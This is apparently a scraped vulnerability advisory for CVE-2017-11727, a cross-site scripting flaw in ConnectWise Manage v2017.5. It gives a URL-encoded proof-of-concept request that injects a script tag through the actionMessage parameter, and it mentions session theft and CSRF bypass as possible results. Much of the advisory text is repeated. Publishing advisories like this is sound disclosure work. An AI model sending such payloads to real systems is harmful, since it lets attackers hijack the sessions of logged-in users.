Vendor:
====================
ConnectWise
Product:
===================
ConnectWise Manage - v2017.5
Vulnerability Type:
==========================
Cross site scripting - XSS
CVE Reference:
==============
CVE-2017-11727
Vulnerability Details:
======================
XSS Exploit code(s):
====================
https://<domain>.com/v4_6_release/services/system_io/actionprocessor/Contact.rails?
actionMessage=%7b%22payload%22%3a%22%7b%5c%22companyRecId%5c%22%3a19383%7d%22%2c%22payloadClassName%22%3a%22GetCompanyNameAction%vcdj%3cscript%3ealert(1111)%3c%5c%2fscript%3ex9uwe%22%7d&clientTimezoneOffset=-420&clientTimezoneName=Pacific+Standard+Time
Proof-of-Concept:
====================
Disclosure Timeline:
=====================
Mitre Notification: July 29, 2017
Public Disclosure: 01 August, 2017
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] ConnectWise Manage - v2017.5
Vulnerable Parameter(s): [+] actionMessage
[+] Disclaimer
====================
ConnectWise
Product:
===================
ConnectWise Manage - v2017.5
Vulnerability Type:
==========================
Cross site scripting - XSS
CVE Reference:
==============
CVE-2017-11727
Vulnerability Details:
======================
ConnectWise Manage application allows arbitrary client side JS code execution on victims who click our infected link. Session ID and data theft may follow as well as possibility to bypass CSRF protections, injection of iframes to establish communication channels etc. The application also allows 'post' request to be sent in 'get' request which allows attacker to send the payload remotely.
The vulnerability exist after login into the application.
The vulnerability exist after login into the application.
XSS Exploit code(s):
https://<domain>.com/v4_6_release/services/system_io/actionprocessor/Contact.rails?
actionMessage=%7b%22payload%22%3a%22%7b%5c%22companyRecId%5c%22%3a19383%7d%22%2c%22payloadClassName%22%3a%22GetCompanyNameAction%vcdj%3cscript%3ealert(1111)%3c%5c%2fscript%3ex9uwe%22%7d&clientTimezoneOffset=-420&clientTimezoneName=Pacific+Standard+Time
Affected Component:
====================
Parameter : actionMessage which includes json parameters(ContactCommon)
Proof-of-Concept:
====================
Disclosure Timeline:
=====================
Mitre Notification: July 29, 2017
Public Disclosure: 01 August, 2017
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] ConnectWise Manage - v2017.5
Vulnerable Parameter(s): [+] actionMessage
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
0 Comments